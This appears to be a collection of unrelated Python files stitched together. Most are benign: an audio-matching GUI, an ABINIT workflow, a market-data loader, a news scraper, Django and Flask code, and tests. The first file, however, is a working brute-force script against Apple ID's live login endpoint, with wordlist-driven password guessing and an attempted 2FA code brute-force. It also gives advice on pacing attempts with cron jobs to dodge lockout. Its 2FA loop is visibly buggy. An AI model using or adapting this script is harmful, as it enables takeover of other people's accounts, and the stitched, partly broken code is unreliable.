appleid = str(input("APPLE ID: "))
if not password:
password = str(input("PASSWORD: "))
formdata["appleId"] = appleid
formdata["accountPassword"] = password
# Apparently you can log into dev account
formdata["ENV"] = environ
# Authenticate with Apple
print("[{}]: TRYING {}...".format(appleid, password))
authres = self.s.post("https://idmsa.apple.com/IDMSWebAuth/authenticate", data=formdata, allow_redirects=True)
# Check if login failed
if "Your account information was entered incorrectly" in authres.text:
print("WRONG PASSWORD")
return 1
elif "Your Apple ID or password was entered incorrectly" in authres.text:
print("ACCOUNT DOES NOT EXIST")
return 2
# Check if 2FA code is required
elif "Verify your identity" in authres.text:
print("PASSWORD FOUND: {}".format(password))
print("TWO FACTOR")
# Find form for 2FA code
soup = Soup(authres.text, "html.parser")
twofactor = soup.find("form", {"id":"command"}) # 2FA code form has HTML id 'command'
# Brute force the digits
for i in range(0, 1000000):
code = str(i) # Cast to string so we can add prefix of zeroes if needed
# Add prefix if needed
while len(code) < 6:
code = "0"+code
# Set value of the digit input fields to corresponding digit from bruteforce
for n in range(0, 5):
formdata['digit'+str(i+1)] = code[n]
print("Trying {}".format(code), end=": ")
# Try 2-FA code
twofalogin = self.s.post("https://idmsa.apple.com/IDMSWebAuth/"+twofactor['action'], data=formdata, allow_redirects=True)
if "Unauthorized access detected" in twofalogin.text:
print("UNAUTHORIZED ACCESS DETECTED")
break # Just give up, they caught us
else:
break
#print(twofalogin.text)
elif "This Apple ID has been locked for security reasons" in authres.text:
print("APPLE ID BLOCKED :(")
return 2
else:
print(authres.text)
print("SUCCESS")
return 0
def brute(self, userfile=None, passfile=None):
users = None
passwords = None
if userfile:
users = open(userfile, 'r', errors='replace').read().splitlines()
if passfile:
passwords = open(passfile, 'r', errors='replace').read().splitlines()
# Bruteforce
if users and passwords:
for user in users:
if user == "":
continue
for password in passwords:
r = self.attempt(appleid=user, password=password)
if r == 2:
print("Skipping {}".format(user))
break
# Just regular login
else:
self.attempt()
print("")
print("BRUTEFORCE COMPLETED IN: {} seconds".format(int((datetime.datetime.now() - self.tstart).total_seconds())))
print("")
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('userlist', help='Path to wordlist containing usernames to test', nargs='?')
parser.add_argument('passlist', help='Path to wordlist containing passwords to test e.g: rockyou.txt', nargs='?')
args = parser.parse_args()
# Initialize brute forcer
brutus = AppleBrutus()
print("NOTICE:")
print("THIS PROGRAM IS NOT INTENDED FOR HARMFUL PURPOSES AND IS WRITTEN TO DEMO HOW TO CONDUCT A BRUTEFORCE ATTACK")
print("TRYING MILLIONS OF PASSWORDS LEADS TO BLOCKING THE ACCOUNT")
print("")
print("RECOMMENDED STRATEGY: CRON JOB RUNNING EACH FEW HOURS TO TRY FEW PASSWORDS EVERY DAY PER ACCOUNT")
print("ONLINE ATTACKS OFTEN REQUIRE THIS APPROACH!!!")
print("")
print("APPLE ACCOUNTS MAY BE ROTECTED WITH 2FA")
print("THE SCRIPT SUPPORTS 2FA BRUTEFORCE BUT IT IS NOT EFFECTIVE, FOR DEMO ONLY")
print("")
print("TIM COOK, IF U READ THIS: PLEASE ADD CAPTCHA!!!")
print("")
print("Initiating bruteforce............")
# Conduct bruteforce
brutus.brute(userfile=args.userlist, passfile=args.passlist)
|
from re import search
from PyQt5 import QtWidgets
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
from numpy.core.numeric import count_nonzero
from app import Ui_MainWindow
import sys , os
import librosa
import os
import librosa.display
from librosa.core import load
from pydub import AudioSegment
from tempfile import mktemp # To convert mp3 to wav
import pylab
import numpy as np
import matplotlib.pyplot as plt
from song import *
import pandas as pd
from difflib import SequenceMatcher
from PyQt5.QtWidgets import QMessageBox
from imagehash import hex_to_hash
data = pd.read_csv('hashdata.csv')
songfeats=[0,0,0,0]
diffvalue=[0,0,0,0]
# self.results=[]
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super(ApplicationWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.DisableMixer()
self.ui.File1_Browse.clicked.connect(lambda:self.readsignal(0))
self.ui.File2_Browse.clicked.connect(lambda:self.readsignal(1))
self.ui.Search.clicked.connect(lambda:self.similarity())
self.ui.mixer.valueChanged.connect(self.mixer)
self.ui.mixer.setTracking(False)
self.ui.mixer.setMaximum(100)
self.ui.mixer.setMinimum(0)
self.ui.mixer.setSingleStep(1)
self.ui.mixer.setValue(0)
self.results=[]
newfeats=[]
self.paths=[None,None]
def readsignal(self,songnum):
self.fname=QtWidgets.QFileDialog.getOpenFileName(self,' Open File',os.getenv('home'),"mp3(*.mp3) ;; wav(*.wav)")
self.path=self.fname[0]
if songnum ==0 :
print(self.results)
self.paths[0]=self.path
self.ui.name_song1.setText(os.path.splitext(os.path.basename(self.path))[0]) #to write song name
self.song1 = song(self.path)
hashedd= self.song1.feature1()
print(hashedd)
print(self.song1.loadfs())
print("file1 read done")
elif songnum ==1 :
print(self.results)
self.paths[1]=self.path
self.ui.name_song2.setText(os.path.splitext(os.path.basename(self.path))[0])
self.EnableMixer()
self.song2 = song(self.path)
hashedd= self.song2.feature1()
print(self.song2.loadfs())
print(hashedd)
print("file2 read done")
def DisableMixer(self):
self.ui.mixer.setEnabled(False)
def EnableMixer(self):
self.ui.mixer.setEnabled(True)
def mixer(self) :
self.slider = self.ui.mixer.value()/100
self.path1= self.paths[0]
self.path2= self.paths[1]
self.song11= song(self.path1)
self.song22= song(self.path2)
self.mixedsong= self.song11.mix(self.song22, self.slider)
mixfeat1= self.mixedsong.feature1()
# print(type(mixfeat1))
print(mixfeat1)
def hammingcheck(self,s1,s2):
return hex_to_hash(s1) - hex_to_hash(s2)
def findsimilarto(self,feat1, feat2, feat3):
self.results=[]
newfeats=[0,feat1, feat2, feat3]
for i in range(len(data)):
songname2=data.iloc[i,0]
for j in range(1,4):
songfeats[j]=data.iloc[i,j]
diffvalue[j]=( 1-(imagehash.hex_to_hash(str(newfeats[j]))- imagehash.hex_to_hash(str(songfeats[j])) ) / 256.0 )
print(newfeats)
print(songfeats)
similarity= (diffvalue[1]+diffvalue[2]+diffvalue[3])/0.03
self.results.append((songname2,(similarity)))
self.results.sort(key= lambda x: x[1], reverse=True)
self.ui.tableWidget.setColumnCount(2)
self.ui.tableWidget.setRowCount(10)
for i in range(10):
self.ui.tableWidget.setItem(i,0,QtWidgets.QTableWidgetItem(self.results[i][0]))
self.ui.tableWidget.setItem(i,1,QtWidgets.QTableWidgetItem(str((self.results[i][1]))+"%"))
def similarity(self):
if (self.paths[0] is not None) & (self.paths[1] is not None):
self.slider = self.ui.mixer.value()/100
self.song11= song(self.paths[0])
self.song22= song(self.paths[1])
self.mixedsong= self.song11.mix(self.song22, self.slider)
self.findsimilarto(self.mixedsong.feature1(),self.mixedsong.feature2(),self.mixedsong.feature3())
elif (self.paths[0] is not None):
self.thissong1=song(self.paths[0])
self.findsimilarto(self.thissong1.feature1(),self.thissong1.feature2(),self.thissong1.feature3())
elif (self.paths[1] is not None):
self.thissong2=song(self.paths[1])
self.findsimilarto(self.thissong2.feature1(), self.thissong2.feature2(), self.thissong2.feature3())
else:
print("no songs")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
application = ApplicationWindow()
application.show()
app.exec_()
|
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/medmanager"
# docs_base_url = "https://[org_name].github.io/medmanager"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "Medical Manager"
|
#!/usr/bin/env python
import sys
import numpy as np
import abipy.abilab as abilab
import abipy.flowtk as flowtk
import abipy.data as abidata
def gs_input(x=0.7, ecut=10, acell=(10, 10, 10)):
"""
This function builds an AbinitInput object to compute the total energy
of the H2 molecule in a big box.
Args:
x: Position of the first Hydrogen along the x-axis in Cartesian coordinates.
The second Hydrogen is located at [-x, 0, 0]
ecut: Cutoff energy in Ha.
acell: Lengths of the primitive vectors (in Bohr)
Returns:
AbinitInput object.
"""
# Build structure from dictionary with input variables.
structure = abilab.Structure.from_abivars(
ntypat=1, # There is only one type of atom.
znucl=1, # Atomic numbers of the type(s) of atom.
natom=2, # There are two atoms.
typat=(1, 1), # They both are of type 1, that is, Hydrogen.
xcart=[-x, 0.0, 0.0, # Cartesian coordinates of atom 1, in Bohr.
+x, 0.0, 0.0], # second atom.
acell=acell, # Lengths of the primitive vectors (in Bohr).
rprim=[1, 0, 0, 0, 1, 0, 0, 0, 1] # Orthogonal primitive vectors (default).
)
# Build AbinitInput from structure and pseudo(s) taken from AbiPy package.
inp = abilab.AbinitInput(structure=structure, pseudos=abidata.pseudos("01h.pspgth"))
# Set value of other variables.
inp.set_vars(
ecut=ecut,
nband=1,
diemac=2.0,
toldfe=1e-6,
prtwf=-1,
iomode=3
)
# Define k-point sampling.
inp.set_kmesh(ngkpt=(1, 1, 1), shiftk=(0, 0, 0))
return inp
def build_flow(options):
"""
Generate a flow to compute the total energy and forces for the H2 molecule in a big box
as a function of the interatomic distance.
Args:
options: Command line options.
Return:
Flow object.
"""
inputs = [gs_input(x=x) for x in np.linspace(0.5, 1.025, 21)]
workdir = options.workdir if (options and options.workdir) else "flow_h2"
return flowtk.Flow.from_inputs(workdir, inputs)
@flowtk.flow_main
def main(options):
"""
This is our main function that will be invoked by the script.
flow_main is a decorator implementing the command line interface.
Command line args are stored in `options`.
"""
return build_flow(options)
if __name__ == "__main__":
sys.exit(main())
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import pickle
data = pd.read_csv("../data/cleaned_data.csv")
data.drop(['Unnamed: 0', 'Price_m2'], axis=1, inplace=True)
df_features = data.drop(["Price_eur"], 1)
num_features = df_features.drop(["City"], 1)
# Encoding categorical data
encoder = OneHotEncoder(drop='first', sparse=False)
enc_df = pd.DataFrame(encoder.fit_transform(data[['City']]))
# Scaling numeric data
scaler = StandardScaler()
scaled_data = scaler.fit_transform(num_features)
# Joining scaled and encoded data
features = np.concatenate([scaled_data, enc_df], axis=-1,)
label = data['Price_eur']
X_train, X_test, y_train, y_test = train_test_split(features, label, test_size=0.2, random_state=10)
# Prediction with Linear Regression
clf = LinearRegression()
clf.fit(X_train, y_train)
predicted = clf.predict(X_test)
expected = y_test
# Saving model to file
with open("clf.pkl", "wb") as f:
pickle.dump(clf, f)
with open("encoder.pkl", "wb") as ohe:
pickle.dump(encoder, ohe)
with open("scaler.pkl", "wb") as sc:
pickle.dump(scaler, sc)
|
import os
import sys
import time
import random
import pandas as pd
import yfinance as yf
from loguru import logger
from tqdm.auto import tqdm
from datetime import datetime
from datetime import timedelta
from finam import Exporter, Market, Timeframe
# TODO
# disabling progress bar
# disabling logs
# directory by default
# other intervals: 5m, 15m, 4h
# update mode
# unit tests
class BarLoader:
"""Data history downloader from yahoofinance, finam and binance.
"""
VALID_INTERVALS = ['1d', '1h']
def __init__(self) -> None:
self.start = datetime.utcnow()-timedelta(days=7)
self.end = datetime.utcnow()
self.interval = '1d'
logger.add('barlodaer.log')
logger.add(sys.stdout, level="ERROR")
def yf(self, tickers, start=None, end=None, interval=None, tocsv=True, postfix=None):
"""Download history data from https://finance.yahoo.com/
Args:
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
postfix (str, optional): Need for some tickers. For example, if you
need RUB/USD pair, ticker would be 'RUB' and postfix 'USD=X'. See ticker
on yahoo finance. Defaults to None.
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
if postfix == None:
postfix = ''
if interval is None:
interval = self.interval
if interval not in self.VALID_INTERVALS:
logger.error(f"Interval {interval} not valid. Available {', '.join(self.VALID_INTERVALS)}")
return
if start is None:
start = self.start.strftime('%Y-%m-%d')
elif interval == '1d':
start = start.strftime('%Y-%m-%d')
else:
start = start.strftime('%Y-%m-%d %H:%M:%S')
if end is None:
end = self.end.strftime('%Y-%m-%d')
elif interval == '1d':
end = end.strftime('%Y-%m-%d')
else:
end = end.strftime('%Y-%m-%d %H:%M:%S')
directory = self.interval
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error(f"Directory \"{directory}\" creation error: {e}")
tickers_list = []
for ticker in tqdm(tickers):
try:
ticker = ticker + postfix
human_filter = ''.join(filter(str.isalpha, ticker))
logger.info(human_filter)
df = yf.download(ticker, start=start, end=end, interval=interval, progress=False)
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{human_filter}.csv")
else:
tickers_list.append(df)
except Exception as e:
logger.error(f"Download {ticker} from yahoo finance error: {e}")
return tickers_list
def finam(self, tickers, market=None, start=None, end=None, interval=None, tocsv=True):
"""Download history data from https://www.finam.ru/
Args:
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
market (str, optional): Need if you download futures. Defaults to None (shares).
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
if start is None:
start = self.start
else:
start = datetime.strptime(start, '%Y-%m-%d').date()
if end is None:
end = self.end
else:
end = datetime.strptime(end, '%Y-%m-%d').date()
if interval is None or interval == '1d':
directory = '1d'
interval = Timeframe.DAILY
elif interval == '1h':
directory = '1h'
interval = Timeframe.HOURLY
else:
logger.error(f"Interval {interval} not valid")
return
if market == 'futures':
market = Market.FUTURES_ARCHIVE
else:
market = Market.SHARES
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error("Directory \"{directory}\" creation error: {e}")
tickers_list = []
exporter = Exporter()
for ticker in tqdm(tickers):
try:
logger.info(ticker)
asset = exporter.lookup(code=ticker, market=market)
asset_id = asset[asset['code'] == ticker].index[0]
df = exporter.download(asset_id, market=market, start_date=start, end_date=end, timeframe=interval, delay=random.randint(3,5))
df['<DATE>'] = pd.to_datetime(df['<DATE>'], format='%Y%m%d')
df.drop('<TIME>', axis=1, inplace=True)
columns = {'<DATE>': 'Date', '<OPEN>': 'Open', '<HIGH>': 'High', '<LOW>': 'Low', '<CLOSE>': 'Close', '<VOL>': 'Volume'}
df = df.rename(columns=columns).set_index('Date')
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{ticker}.csv")
else:
tickers_list.append(df)
time.sleep(random.randint(3, 5))
except Exception as e:
logger.error(f"Download {ticker} from finam error: {e}")
return tickers_list
def binance(self, tickers, client, start=None, end=None, interval=None, tocsv=True):
"""Download history data from https://www.binance.com
Args:
client (binance.client.Client class): binance api client https://github.com/sammchardy/python-binance
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
if start == None:
start = self.start.strftime('%Y-%m-%d %H:%M:%S')
else:
start = start.strftime('%Y-%m-%d %H:%M:%S')
if end == None:
end = self.end.strftime('%Y-%m-%d %H:%M:%S')
else:
end = end.strftime('%Y-%m-%d %H:%M:%S')
if interval == None:
interval = self.interval
if interval not in self.VALID_INTERVALS:
logger.error(f"Interval {interval} not valid")
return
directory = interval
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error("Directory \"{directory}\" creation error: {e}")
# download data
tickers_list = []
for ticker in tqdm(tickers):
try:
logger.info(ticker)
df = pd.DataFrame()
lines = []
for kline in client.get_historical_klines_generator(ticker, interval, start, end):
lines.append(kline)
# convert list of lists to dataframe
df = pd.DataFrame(lines)
df.columns=['dateTime', 'open', 'high', 'low', 'close', 'volume',
'closeTime', 'quoteAssetVolume', 'numberOfTrades',
'takerBuyBaseVol', 'takerBuyQuoteVol', 'ignore']
df.dateTime = pd.to_datetime(df.dateTime, unit='ms').dt.strftime('%Y-%m-%d %H:%M:%S')
df.set_index('dateTime', inplace=True)
# delete some unuseful columns
df = df.drop(['closeTime', 'quoteAssetVolume', 'numberOfTrades',
'takerBuyBaseVol','takerBuyQuoteVol', 'ignore'], axis=1)
# save to file
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{ticker}.csv")
else:
tickers_list.append(df)
except Exception as e:
logger.error(f"Download {ticker} from binance error: {e}")
return tickers_list
if __name__ == '__main__':
# usage examples
bl = BarLoader()
# finam shares
f = bl.finam(['GAZP', 'SBER'], tocsv=False)
print(f)
# yahoo finance
bl.yf(['AAPL', 'TSLA'])
# finam futures
bl.finam(['Si', 'RTS'], market='futures')
# biance
from binance.client import Client
api_key = 'your api key'
api_secret = 'your api secret'
client = Client(api_key, api_secret)
b = bl.binance(['BTCUSDT', 'BNBETH'], client=client)
# use saved tickers
from barloader import tickers as t
bl.yf(t.usetf)
bl.finam(t.rufutures, market='futures')
bl.yf(t.currency, postfix=t.currency.yf_postfix)
# custom parameters
start = datetime(2019, 1, 1)
end = datetime(2019, 2, 1)
interval = '1h'
bl.yf(t.usetf, start=start, end=end, interval=interval)
bl.finam(t.rufutures, market='futures', start=start, end=end, interval=interval)
bl.yf(t.currency, postfix=t.currency.yf_postfix, start=start, end=end, interval=interval)
# short notation of custom parameters
bl.start = datetime(2019, 1, 1)
bl.end = datetime(2019, 2, 1)
bl.interval = '1h'
bl.yf(t.usetf)
bl.finam(t.rufutures, market='futures')
bl.yf(t.currency, postfix=t.currency.yf_postfix)
|
from netmiko import ConnectHandler, ssh_exception
def netmiko(host: str = None, username: str = None, password: str = None) -> object:
"""Logs into device and returns a connection object to the caller. """
credentials = {
'device_type': 'cisco_ios',
'host': host,
'username': username,
'password': password,
'session_log': 'my_file.out'}
try:
device_connect = ConnectHandler(**credentials)
except ssh_exception.AuthenticationException:
raise ConnectionError("Could not connect to device {}".format(host))
return device_connect
def netmiko_w_enable(host: str = None, username: str = None, password: str = None, **enable) -> object:
"""Logs into device and returns a connection object to the caller. """
try:
credentials = {
'device_type': 'cisco_asa',
'host': host,
'username': username,
'password': password,
'secret': enable["enable_pass"],
'session_log': 'my_file.out'}
try:
device_connect = ConnectHandler(**credentials)
except ssh_exception.AuthenticationException:
raise ConnectionError("Could not connect to device {}".format(host))
return device_connect
except KeyError:
pass
|
from __future__ import unicode_literals, print_function
from bs4 import BeautifulSoup
from scraper import AbsractScraper, RssFeed
import time
FOX_Latest = 'http://feeds.foxnews.com/foxnews/latest?format=xml'
FOX_Politics = 'http://feeds.foxnews.com/foxnews/politics?format=xml'
FOX_Science = 'http://feeds.foxnews.com/foxnews/science?format=xml'
FOX_Sports = 'http://feeds.foxnews.com/foxnews/sports?format=xml'
FOX_Tech = 'http://feeds.foxnews.com/foxnews/tech?format=xml'
FOX_National = 'http://feeds.foxnews.com/foxnews/national'
FOX_World = 'http://feeds.foxnews.com/foxnews/world'
FOX_Business = 'http://feeds.foxnews.com/foxnews/business'
FOX_SciTech = 'http://feeds.foxnews.com/foxnews/scitech'
FOX_Health = 'http://feeds.foxnews.com/foxnews/health'
FOX_Entertainment = 'http://feeds.foxnews.com/foxnews/entertainment'
FOX_Views = 'http://feeds.foxnews.com/foxnews/views'
FOX_Blogs = 'http://feeds.foxnews.com/foxnews/foxblogs'
# Columns
FOX_MikeStrakaGrrr = 'http://feeds.foxnews.com/foxnews/column/grrr'
FOX_PopTarts = 'http://feeds.foxnews.com/foxnews/column/poptarts'
FOX_411 = 'http://feeds.foxnews.com/foxnews/column/fox411'
_ALLFEEDS = [
FOX_Latest,
FOX_Politics,
FOX_Science,
FOX_Sports,
FOX_Tech,
FOX_National,
FOX_World,
FOX_Business,
FOX_SciTech,
FOX_Health,
FOX_Entertainment,
FOX_Views,
FOX_Blogs,
FOX_MikeStrakaGrrr,
FOX_PopTarts,
FOX_411
]
class FoxScraper(AbsractScraper):
'''Scraper for Fox news articles.'''
def __init__(self, *args, **kwargs):
super(FoxScraper, self).__init__(*args, **kwargs)
# Number of requests before clearing cookies
self.count = self.max_count = 5
def get_article_text(self, url):
"""Scrape the article text.
Args:
url: The article url.
Returns:
A string.
"""
self.browser.get(url)
soup = BeautifulSoup(self.browser.page_source, "html.parser")
article = soup.select('div.article-body')
text = []
for a in article:
paragraphs = a.find_all('p')
for p in paragraphs:
text.append(p.text)
self.cookie_count()
return '\n'.join(text)
@classmethod
def get_rss_feed_list(cls):
"""Returns a list of tuples of feed urls."""
return _ALLFEEDS
if __name__ == '__main__':
rss = RssFeed(FOX_Politics)
scraper = FoxScraper()
print(rss.feed.title)
articles = rss.get_articles()
for a in articles:
print(a.title)
print('='*len(a.title))
print(a.link)
print(a.summary)
print('--begin-body--')
text = scraper.get_article_text(a.link)
print(text)
time.sleep(1)
print('--end-body--')
|
# Generated by Django 3.1.3 on 2021-05-20 18:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('onlinecourse', '0002_auto_20210520_1823'),
]
operations = [
migrations.AlterField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.question'),
),
migrations.AlterField(
model_name='question',
name='course',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='onlinecourse.course'),
),
migrations.AlterField(
model_name='submission',
name='choices',
field=models.ManyToManyField(to='onlinecourse.Choice'),
),
]
|
import pytest
from web_error import error
class A404Error(error.NotFoundException):
code = "E404"
message = "a 404 message"
class A401Error(error.UnauthorisedException):
code = "E401"
message = "a 401 message"
class A400Error(error.BadRequestException):
code = "E400"
message = "a 400 message"
class A500Error(error.ServerException):
code = "E500"
message = "a 500 message"
@pytest.mark.parametrize("exc", [
A404Error,
A401Error,
A400Error,
A500Error,
])
def test_marshal(exc):
e = exc("debug_message")
assert e.marshal() == {
"code": "E{}".format(e.status),
"message": e.message,
"debug_message": "debug_message",
}
@pytest.mark.parametrize("exc", [
A404Error,
A401Error,
A400Error,
A500Error,
])
def test_reraise(exc):
e = exc("debug_message")
d = e.marshal()
try:
error.HttpException.reraise(status=e.status, **d)
except error.HttpException as exc:
assert exc.status == e.status
assert exc.marshal() == {
"code": "E{}".format(e.status),
"message": e.message,
"debug_message": "debug_message",
}
|
# Copyright (c) 2019 Jarret Dyrbye
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php
import time
import RPi.GPIO as GPIO
from twisted.internet import threads
from twisted.internet import reactor
from twisted.internet.task import LoopingCall
from print import print_green, print_light_blue
COIN_MECH_RELAY = 7
INSERT_CHANGE_LIGHT = 13
class Electrical(object):
def __init__(self, reactor, machine):
self.reactor = reactor
self.machine = machine
self.insert_change_inputs = [0, 0]
self.insert_change_state = 0
#GPIO.add_event_detect(INSERT_CHANGE_LIGHT, GPIO.RISING,
# callback=self.rising, bouncetime=500)
#GPIO.add_event_detect(INSERT_CHANGE_LIGHT, GPIO.FALLING,
# callback=self.falling)
self.machine.set_electrical(self)
#_ = threads.deferToThread(Electrical.set_high)
lc = LoopingCall(self.check_input)
lc.start(1.0)
def setup_gpio():
if GPIO.getmode() != GPIO.BOARD:
GPIO.setmode(GPIO.BOARD)
GPIO.setup(COIN_MECH_RELAY, GPIO.OUT)
GPIO.setup(INSERT_CHANGE_LIGHT, GPIO.IN, pull_up_down=GPIO.PUD_UP)
def flip_delay_flip():
GPIO.output(COIN_MECH_RELAY, GPIO.HIGH)
print("sleeping")
time.sleep(2)
GPIO.output(COIN_MECH_RELAY, GPIO.LOW)
#def set_high():
# GPIO.output(COIN_MECH_RELAY, GPIO.HIGH)
def trigger_coin_mech(self):
print_green("triggering coin mech")
_ = threads.deferToThread(Electrical.flip_delay_flip)
def check_input(self):
r = GPIO.input(INSERT_CHANGE_LIGHT)
#print("check: %s" % r)
self.insert_change_inputs.pop(0)
self.insert_change_inputs.append(r)
assert len(self.insert_change_inputs) == 2
last_input_sum = sum(self.insert_change_inputs)
if last_input_sum == 2:
if self.insert_change_state == 1:
self.insert_change_state = 0;
self.insert_change_turn_off()
elif last_input_sum == 1:
return
elif last_input_sum == 0:
if self.insert_change_state == 0:
self.insert_change_state = 1;
self.insert_change_turn_on()
def insert_change_ambiguous(self):
print("insert change ambiguous")
def insert_change_turn_on(self):
print("insert change on")
self.machine.post_vend_finished()
def insert_change_turn_off(self):
print("insert change off")
#def _both_cb(self, button_no):
# r = GPIO.input(button_no)
# if r:
# reactor.callFromThread(self.falling, button_no)
# else:
# reactor.callFromThread(self.rising, button_no)
def falling(self, button_no):
print_green("electrical falling %s" % button_no)
def rising(self, button_no):
print_green("electrical rising %s" % button_no)
self.machine.post_vend_finished()
|
import math
N = int(input())
X = [0] * N
Y = [0] * N
for i in range(N):
X[i], Y[i] = map(int, input().split())
ans = 0
for i in range(N):
for j in range(i + 1, N):
x1, y1, x2, y2 = X[i], Y[i], X[j], Y[j]
ans = max(ans, math.sqrt(abs(x1 - x2) ** 2 + abs(y1 - y2) ** 2))
print(ans)
|
class TransactionFactory:
def __init__(self, logger):
self.logger = logger
def get_transaction(self, bank_transaction):
"""
return an object HbTransaction or an object derived from him.
"""
raise NotImplementedError
|
# coding=utf8
import logging
import random
import numpy as np
import tensorflow as tf
from seq2seq_conversation_model import seq2seq_model
_LOGGER = logging.getLogger('track')
def test_tokenizer():
words = fmm_tokenizer(u'嘿,机器人同学,你都会些啥?')
for w in words:
print(w)
def test_conversation_model():
"""Test the conversation model."""
with tf.Session() as sess:
print("Self-test for neural conversation model.")
# Create model with vocabularies of 10, 2 small buckets, 2 layers of 32.
model = seq2seq_model.Seq2SeqModel(10, 10, [(3, 3), (6, 6)], 32, 2,
5.0, 32, 0.3, 0.99, num_samples=8)
sess.run(tf.initialize_all_variables())
# Fake data set for both the (3, 3) and (6, 6) bucket.
data_set = ([([1, 1], [2, 2]), ([3, 3], [4]), ([5], [6])],
[([1, 1, 1, 1, 1], [2, 2, 2, 2, 2]), ([3, 3, 3], [5, 6])]
)
for _ in xrange(5): # Train the fake model for 5 steps.
bucket_id = random.choice([0, 1])
encoder_inputs, decoder_inputs, target_weights = model.get_batch(
data_set, bucket_id)
model.step(sess, encoder_inputs, decoder_inputs, target_weights,
bucket_id, False)
a, b, c = model.step(sess, encoder_inputs, decoder_inputs,
target_weights,
bucket_id, True)
print (c)
c = np.array(c)
print (c.shape)
outputs = [np.argmax(logit, axis=1) for logit in c]
print (outputs)
if __name__ == "__main__":
# test_tokenizer()
test_conversation_model()
|
from pathlib import Path
def write_schemas(schemas, directory):
for i, schema in enumerate(schemas):
filename = Path(directory) / schema.filepath.lstrip("/")
filename.parent.mkdir(parents=True, exist_ok=True)
if i == 0:
target_filename = filename
with open(filename, "wb") as f:
f.write(schema.schema)
return target_filename
|
from flask import render_template, redirect, url_for, flash, session, request, g, abort
from functools import wraps
from app.admin.forms import LoginForm, AdminForm, RoleForm, AuthForm, MovieForm, TagForm, PreviewForm
from app.models import Admin, Tag, Movie, Preview, User, Comment, Moviecol, Oplog, Adminlog, Userlog, Auth, Role
from app import db, app
from . import admin
import os, uuid
from datetime import datetime
from werkzeug.utils import secure_filename
def change_filename(filename):
"""
修改文件名称
"""
fileinfo = os.path.splitext(filename)
filename = datetime.now().strftime("%Y%m%d%H%M%S") + str(uuid.uuid4().hex) + fileinfo[-1]
return filename
def admin_login_req(f):
"""
登录装饰器
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if "admin" not in session:
return redirect(url_for("admin.login", next=request.url))
return f(*args, **kwargs)
return decorated_function
@admin.before_request
def before_request():
g.logo = "mtianyan.jpg"
@admin.route("/")
@admin_login_req
def index():
"""
后台首页系统管理
"""
g.logo = "mtianyan.jpg"
return render_template("admin/index.html")
@admin.route("/pwd/", methods=["GET", "POST"])
@admin_login_req
def pwd():
"""
后台密码修改
"""
return 'pwd'
@admin.route("/login/", methods=["GET", "POST"])
def login():
"""
后台登录
"""
form = LoginForm();
if form.validate_on_submit():
data = form.data
admin = Admin.query.filter_by(name=data["account"]).first()
if admin:
# 密码错误时,check_pwd返回false,则此时not check_pwd(data["pwd"])为真。
if not admin.check_pwd(data["pwd"]):
flash("密码错误!", "err")
return redirect(url_for("admin.login"))
else:
flash("账户不存在!", "err")
return redirect(url_for("admin.login"))
# 如果是正确的,就要定义session的会话进行保存。
session["admin"] = data["account"]
session["admin_id"] = admin.id
# admin = Admin.query.filter_by(name=session["admin"]).first()
# g.logo = "mtianyan.jpg"
# 后台头像实现的可能解决方法,将当前管理员的头像信息,存在session中。
adminlog = Adminlog(
admin_id=admin.id,
ip=request.remote_addr,
)
db.session.add(adminlog)
db.session.commit()
return redirect(request.args.get("next") or url_for("admin.index"))
return render_template("admin/login.html", form=form)
@admin.route("/logout/")
@admin_login_req
def logout():
"""
后台注销登录
"""
session.pop("admin", None)
session.pop("admin_id", None)
return redirect(url_for("admin.login"))
@admin.route("/tag/add/", methods=["GET", "POST"])
@admin_login_req
def tag_add():
"""
标签添加
"""
form = TagForm()
g.logo = "mtianyan.jpg"
if form.validate_on_submit():
data = form.data
tag = Tag.query.filter_by(name=data["name"]).count()
# 说明已经有这个标签了
if tag == 1:
flash("标签已存在", "err")
return redirect(url_for("admin.tag_add"))
tag = Tag(
name=data["name"]
)
db.session.add(tag)
db.session.commit()
oplog = Oplog(
admin_id=session["admin_id"],
ip=request.remote_addr,
reason="添加标签%s" % data["name"]
)
db.session.add(oplog)
db.session.commit()
flash("标签添加成功", "ok")
